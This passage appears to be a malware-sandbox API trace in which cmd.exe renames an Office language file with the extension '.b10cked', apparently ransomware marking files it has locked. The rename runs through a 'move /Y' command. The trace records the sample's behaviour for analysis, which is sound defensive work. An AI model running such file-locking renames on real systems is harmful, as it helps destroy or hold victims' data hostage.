phkResult=0x20fd5c*=0x0) returned 0x2 [0172.232] VirtualQuery (in: lpAddress=0x20fd93, lpBuffer=0x20fd2c, dwLength=0x1c | out: lpBuffer=0x20fd2c*(BaseAddress=0x20f000, AllocationBase=0x110000, 
AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0172.232] VirtualQuery (in: lpAddress=0x110000, lpBuffer=0x20fd2c, dwLength=0x1c | out: lpBuffer=0x20fd2c*(BaseAddress=0x110000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0172.232] VirtualQuery (in: lpAddress=0x111000, lpBuffer=0x20fd2c, dwLength=0x1c | out: lpBuffer=0x20fd2c*(BaseAddress=0x111000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0172.232] VirtualQuery (in: lpAddress=0x113000, lpBuffer=0x20fd2c, dwLength=0x1c | out: lpBuffer=0x20fd2c*(BaseAddress=0x113000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0172.232] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x20fd2c, dwLength=0x1c | out: lpBuffer=0x20fd2c*(BaseAddress=0x210000, AllocationBase=0x210000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0172.232] GetConsoleOutputCP () returned 0x1b5 [0172.233] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0172.233] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0172.233] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.233] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0172.233] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.233] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0172.233] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.233] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0172.233] _get_osfhandle (_FileHandle=0) returned 0x3 [0172.233] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0172.233] _get_osfhandle (_FileHandle=0) returned 0x3 [0172.233] SetConsoleMode 
(hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0172.234] GetEnvironmentStringsW () returned 0x340210* [0172.234] FreeEnvironmentStringsW (penv=0x340210) returned 1 [0172.234] GetEnvironmentStringsW () returned 0x340210* [0172.234] FreeEnvironmentStringsW (penv=0x340210) returned 1 [0172.234] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20eccc | out: phkResult=0x20eccc*=0x40) returned 0x0 [0172.234] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20ecd4, lpData=0x20ecd8, lpcbData=0x20ecd0*=0x1000 | out: lpType=0x20ecd4*=0x0, lpData=0x20ecd8*=0xa0, lpcbData=0x20ecd0*=0x1000) returned 0x2 [0172.234] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20ecd4, lpData=0x20ecd8, lpcbData=0x20ecd0*=0x1000 | out: lpType=0x20ecd4*=0x4, lpData=0x20ecd8*=0x1, lpcbData=0x20ecd0*=0x4) returned 0x0 [0172.234] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20ecd4, lpData=0x20ecd8, lpcbData=0x20ecd0*=0x1000 | out: lpType=0x20ecd4*=0x0, lpData=0x20ecd8*=0x1, lpcbData=0x20ecd0*=0x1000) returned 0x2 [0172.234] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20ecd4, lpData=0x20ecd8, lpcbData=0x20ecd0*=0x1000 | out: lpType=0x20ecd4*=0x4, lpData=0x20ecd8*=0x0, lpcbData=0x20ecd0*=0x4) returned 0x0 [0172.234] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20ecd4, lpData=0x20ecd8, lpcbData=0x20ecd0*=0x1000 | out: lpType=0x20ecd4*=0x4, lpData=0x20ecd8*=0x40, lpcbData=0x20ecd0*=0x4) returned 0x0 [0172.234] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20ecd4, lpData=0x20ecd8, lpcbData=0x20ecd0*=0x1000 | out: lpType=0x20ecd4*=0x4, lpData=0x20ecd8*=0x40, lpcbData=0x20ecd0*=0x4) returned 0x0 [0172.234] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", 
lpReserved=0x0, lpType=0x20ecd4, lpData=0x20ecd8, lpcbData=0x20ecd0*=0x1000 | out: lpType=0x20ecd4*=0x0, lpData=0x20ecd8*=0x40, lpcbData=0x20ecd0*=0x1000) returned 0x2 [0172.234] RegCloseKey (hKey=0x40) returned 0x0 [0172.234] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20eccc | out: phkResult=0x20eccc*=0x40) returned 0x0 [0172.234] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20ecd4, lpData=0x20ecd8, lpcbData=0x20ecd0*=0x1000 | out: lpType=0x20ecd4*=0x0, lpData=0x20ecd8*=0x40, lpcbData=0x20ecd0*=0x1000) returned 0x2 [0172.234] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20ecd4, lpData=0x20ecd8, lpcbData=0x20ecd0*=0x1000 | out: lpType=0x20ecd4*=0x4, lpData=0x20ecd8*=0x1, lpcbData=0x20ecd0*=0x4) returned 0x0 [0172.235] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20ecd4, lpData=0x20ecd8, lpcbData=0x20ecd0*=0x1000 | out: lpType=0x20ecd4*=0x0, lpData=0x20ecd8*=0x1, lpcbData=0x20ecd0*=0x1000) returned 0x2 [0172.235] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20ecd4, lpData=0x20ecd8, lpcbData=0x20ecd0*=0x1000 | out: lpType=0x20ecd4*=0x4, lpData=0x20ecd8*=0x0, lpcbData=0x20ecd0*=0x4) returned 0x0 [0172.235] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20ecd4, lpData=0x20ecd8, lpcbData=0x20ecd0*=0x1000 | out: lpType=0x20ecd4*=0x4, lpData=0x20ecd8*=0x9, lpcbData=0x20ecd0*=0x4) returned 0x0 [0172.235] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20ecd4, lpData=0x20ecd8, lpcbData=0x20ecd0*=0x1000 | out: lpType=0x20ecd4*=0x4, lpData=0x20ecd8*=0x9, lpcbData=0x20ecd0*=0x4) returned 0x0 [0172.235] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20ecd4, lpData=0x20ecd8, 
lpcbData=0x20ecd0*=0x1000 | out: lpType=0x20ecd4*=0x0, lpData=0x20ecd8*=0x9, lpcbData=0x20ecd0*=0x1000) returned 0x2 [0172.235] RegCloseKey (hKey=0x40) returned 0x0 [0172.235] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886388 [0172.235] srand (_Seed=0x5b886388) [0172.235] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL.REST.trx_dll.b10cked\"" [0172.235] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL.REST.trx_dll.b10cked\"" [0172.235] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0172.235] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x341970, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0172.235] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0172.235] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0172.236] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0172.236] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0172.236] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0172.236] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0172.236] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0172.236] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 
[0172.236] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0172.236] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0172.236] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0172.236] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0172.236] GetEnvironmentStringsW () returned 0x342360* [0172.236] FreeEnvironmentStringsW (penv=0x342360) returned 1 [0172.236] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0172.236] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0172.236] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0172.236] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0172.236] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0172.236] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0172.236] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0172.236] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0172.236] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0172.236] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0172.236] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x20fa98 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0172.236] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x20fa98, lpFilePart=0x20fa94 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x20fa94*="Desktop") returned 0x18 [0172.236] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0172.237] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x20f814 | out: lpFindFileData=0x20f814) returned 0x3409f0 [0172.237] FindClose (in: hFindFile=0x3409f0 | out: hFindFile=0x3409f0) returned 1 [0172.237] 
FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x20f814 | out: lpFindFileData=0x20f814) returned 0x3409f0 [0172.237] FindClose (in: hFindFile=0x3409f0 | out: hFindFile=0x3409f0) returned 1 [0172.237] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x20f814 | out: lpFindFileData=0x20f814) returned 0x3409f0 [0172.237] FindClose (in: hFindFile=0x3409f0 | out: hFindFile=0x3409f0) returned 1 [0172.237] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0172.237] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0172.237] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0172.237] GetEnvironmentStringsW () returned 0x340210* [0172.237] FreeEnvironmentStringsW (penv=0x340210) returned 1 [0172.237] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0172.238] GetConsoleOutputCP () returned 0x1b5 [0172.238] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0172.238] GetUserDefaultLCID () returned 0x409 [0172.238] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0172.238] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x20fbd8, cchData=128 | out: lpLCData="0") returned 2 [0172.238] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x20fbd8, cchData=128 | out: lpLCData="0") returned 2 [0172.238] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x20fbd8, cchData=128 | out: lpLCData="1") returned 2 [0172.238] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0172.239] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0172.239] 
GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0172.239] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0172.239] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0172.239] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0172.239] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0172.239] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0172.239] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0172.239] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0172.239] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0172.240] GetConsoleTitleW (in: lpConsoleTitle=0x330930, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0172.240] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0172.240] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0172.240] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0172.240] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0172.241] _wcsicmp (_String1="move", _String2=")") returned 68 [0172.241] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0172.241] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0172.241] _wcsicmp (_String1="IF", _String2="move") returned -4 [0172.241] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0172.241] _wcsicmp (_String1="REM", _String2="move") returned 5 [0172.241] _wcsicmp 
(_String1="REM/?", _String2="move") returned 5 [0172.244] GetConsoleTitleW (in: lpConsoleTitle=0x20f8d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0172.244] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0172.244] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0172.244] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0172.244] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0172.244] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0172.244] _wcsicmp (_String1="move", _String2="CD") returned 10 [0172.244] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0172.244] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0172.244] _wcsicmp (_String1="move", _String2="REN") returned -5 [0172.244] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0172.244] _wcsicmp (_String1="move", _String2="SET") returned -6 [0172.245] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0172.245] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0172.245] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0172.245] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0172.245] _wcsicmp (_String1="move", _String2="MD") returned 11 [0172.245] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0172.245] _wcsicmp (_String1="move", _String2="RD") returned -5 [0172.245] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0172.245] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0172.245] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0172.245] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0172.245] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0172.245] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0172.245] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0172.245] _wcsicmp (_String1="move", _String2="VER") returned -9 [0172.245] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0172.245] 
_wcsicmp (_String1="move", _String2="EXIT") returned 8 [0172.245] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0172.245] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0172.245] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0172.245] _wcsicmp (_String1="move", _String2="START") returned -6 [0172.245] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0172.245] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0172.245] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0172.247] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0172.247] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0172.247] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x20f68c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x20f684, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x20f684*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0172.248] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0172.248] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0172.248] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0172.248] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0172.248] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0172.248] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0172.248] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0172.248] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0172.248] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0172.248] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0172.248] _wcsnicmp 
(_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0172.248] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0172.248] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0172.248] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0172.248] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0172.248] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0172.248] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0172.248] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0172.248] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0172.248] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0172.248] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0172.248] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0172.248] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0172.248] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0172.248] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0172.248] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0172.248] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0172.248] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0172.248] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0172.248] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0172.248] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0172.248] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0172.483] _wcsnicmp (_String1="/Y", 
_String2="/Y", _MaxCount=0x2) returned 0 [0172.483] _wcsicmp (_String1="ONINTL~2.TRX", _String2=".") returned 65 [0172.483] _wcsicmp (_String1="ONINTL~2.TRX", _String2="..") returned 65 [0172.483] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL~2.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\onintl~2.trx")) returned 0x2020 [0172.483] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x341f20 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0172.484] SetErrorMode (uMode=0x0) returned 0x0 [0172.484] SetErrorMode (uMode=0x1) returned 0x0 [0172.484] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL~2.TRX", nBufferLength=0x104, lpBuffer=0x20f014, lpFilePart=0x20effc | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL~2.TRX", lpFilePart=0x20effc*="ONINTL~2.TRX") returned 0x3c [0172.484] SetErrorMode (uMode=0x0) returned 0x1 [0172.484] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082")) returned 0x2012 [0172.484] _wcsicmp (_String1="ONINTL~2.TRX", _String2=".") returned 65 [0172.484] _wcsicmp (_String1="ONINTL~2.TRX", _String2="..") returned 65 [0172.484] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL~2.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\onintl~2.trx")) returned 0x2020 [0172.484] SetErrorMode (uMode=0x0) returned 0x0 [0172.484] SetErrorMode (uMode=0x1) returned 0x0 [0172.484] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL~2.TRX", nBufferLength=0x104, lpBuffer=0x20f490, lpFilePart=0x20f228 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL~2.TRX", lpFilePart=0x20f228*="ONINTL~2.TRX") returned 0x3c [0172.484] SetErrorMode (uMode=0x0) returned 0x1 
[0172.485] SetErrorMode (uMode=0x0) returned 0x0 [0172.485] SetErrorMode (uMode=0x1) returned 0x0 [0172.485] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL.REST.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x20f698, lpFilePart=0x20f228 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL.REST.trx_dll.b10cked", lpFilePart=0x20f228*="ONINTL.REST.trx_dll.b10cked") returned 0x4b [0172.485] SetErrorMode (uMode=0x0) returned 0x1 [0172.485] SetLastError (dwErrCode=0x0) [0172.485] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL.REST.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\onintl.rest.trx_dll.b10cked")) returned 0xffffffff [0172.485] GetLastError () returned 0x2 [0172.485] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL~2.TRX", fInfoLevelId=0x1, lpFindFileData=0x20eba4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20eba4) returned 0x342130 [0172.485] FindNextFileW (in: hFindFile=0x342130, lpFindFileData=0x20eba4 | out: lpFindFileData=0x20eba4) returned 0 [0172.486] GetLastError () returned 0x12 [0172.486] FindClose (in: hFindFile=0x342130 | out: hFindFile=0x342130) returned 1 [0172.487] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL~2.TRX", fInfoLevelId=0x1, lpFindFileData=0x341cc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x341cc0) returned 0x342130 [0172.488] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL.REST.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x20ee3c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL.REST.trx_dll.b10cked", lpFilePart=0x0) returned 0x4b [0172.488] GetFullPathNameW (in: 
lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL.REST.trx_dll", nBufferLength=0x104, lpBuffer=0x20ee3c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL.REST.trx_dll", lpFilePart=0x0) returned 0x43 [0172.488] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL.REST.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\onintl.rest.trx_dll")) returned 0x2020 [0172.488] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL.REST.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\onintl.rest.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL.REST.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\onintl.rest.trx_dll.b10cked"), 